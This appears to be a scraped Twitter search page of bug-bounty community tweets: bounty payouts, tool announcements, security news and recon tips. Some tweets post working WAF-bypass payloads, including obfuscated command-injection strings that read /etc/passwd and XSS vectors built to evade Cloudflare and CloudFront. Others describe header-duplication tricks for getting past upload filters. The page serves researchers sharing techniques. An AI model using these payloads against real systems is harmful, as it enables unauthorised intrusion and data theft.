Twitter | Search | |
Search Refresh
Ameen Aug 11
: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method
Reply Retweet Like
Hussein Daher Aug 13
A $7000 FUN bug: SSRF using redirection on my subdomain RT and sub if you want more! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :)
Reply Retweet Like
dawgyg Aug 11
Missed my goal by $6230 but $127,000 isnt to bad of a payday. thanks and
Reply Retweet Like
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 Aug 18
Sucuri { RCE }; payloads, dot shot. πŸŒͺ️ Smuggling RCE Payloads: </> /???/??t+/???/??ss?? </> Obfuscating RCE Payloads: </> ;+cat+/e'tc/pass'wd </> </> c\\a\\t+/et\\c/pas\\swd </>
Reply Retweet Like
trimstray Aug 11
You wanna play a game? A huge lists of: - Ethical Hacking Trainings - CTF-s Platforms - Pentesting Labs - Web Training Apps (local installation) - Bug Bounty Platforms From:
Reply Retweet Like
Fisher Aug 14
Cooking together my new extension, called "Scope Monitor". Will help you keep track of endpoints you tested, highlight the ones you didn't check yet and so on. Will try to release a Beta by next week or so 😊
Reply Retweet Like
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 Aug 18
"Cloudflare"; live payloads: 🧠 ~1: &lt;img longdesc="src='x'onerror=alert(document.domain);//&gt;&lt;img " src='showme'&gt; ~2: &lt;img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;
Reply Retweet Like
ImmuniWeb 5h
Reply Retweet Like
Rotem Reiss Aug 11
In case you missed my write-up on how I found multiple stored-XSS on and was able to takeover accounts via legit STORY (and also awarded with a $1000 bounty 😎)
Reply Retweet Like
#BugBountyNews 20h
Fake News and Influence: Information Warfare in the Digital Age
Reply Retweet Like
Ankit Thakur 6h
Send your coolest bug and grab your pass for and join and learn from them.
Reply Retweet Like
#BugBountyNews 21h
Cisco β€˜Knowingly’ Sold Hackable Video Surveillance System to U.S. Government
Reply Retweet Like
#BugBountyNews 19h
Breached Passwords Still in Use By Hundreds of Thousands
Reply Retweet Like
Vail 23h
Question, which do you guys perfer, a VPS or a VPN? or both? If one over the other, why?
Reply Retweet Like
Ali TΓΌtΓΌncΓΌ Aug 12
Wooooow, I thought it will be medium but I saw this comment 😍😍😍😍 This is my first critical report and waiting my biggest reward per report <3😎😎
Reply Retweet Like
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍 3h
{XSS}; CloudFront Bypass, dot shot. ✴️ ~/1~ <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';> ~/2~ <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
Reply Retweet Like
Shubham Mittal 2h
Quick Tip: While you are trying to find more subdomains and you use the Google Dork: site:*.example.com, NEVER forget to check site:*.*.example.com and site:*.*.*.example.com
Reply Retweet Like
Sam Stepanyan 16h
The awesome subdomain recon tool is now available in Kali Linux! In your Kali Linux go and open a terminal & type: apt-get update apt-get install amass Many thanks to project leader & the team who made this possible!
Reply Retweet Like
𝔸𝕀𝕙𝕒𝕣 𝕁𝕒𝕧𝕖𝕕 Aug 19
: Now a days there is no shortage of TARGETS ... The things you need are motivation + focus + skills to get most out of it.
Reply Retweet Like
Davey Aug 13
Wrote a Burp Suite extension to bypass IP based rate limiting and blocking.
Reply Retweet Like